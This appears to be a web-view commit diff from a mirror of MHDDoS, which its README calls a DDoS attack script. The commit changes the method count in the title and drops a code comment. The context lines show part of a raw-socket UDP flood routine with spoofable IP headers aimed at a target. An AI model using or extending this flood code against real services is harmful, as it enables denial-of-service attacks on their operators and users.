mirror of https://github.com/MatrixTM/MHDDoS.git
Updated
This commit is contained in:
parent
33b8bfe64e
commit
e9d0e8da68
|
|
@ -1,4 +1,4 @@
|
|||
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
|
||||
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
|
||||
|
||||
<p align="center">
|
||||
|
|
|
|||
2
start.py
2
start.py
|
|
@ -530,7 +530,7 @@ class Layer4(Thread):
|
|||
Tools.safe_close(s)
|
||||
|
||||
def DISCORD(self) -> None:
|
||||
payload = self._generate_discord() # pacote único bytes
|
||||
payload = self._generate_discord()
|
||||
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
|
||||
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
|
||||
while Tools.sendto(s, payload, self._target):
|
||||
|
|
|
|||
Loading…
Reference in New Issue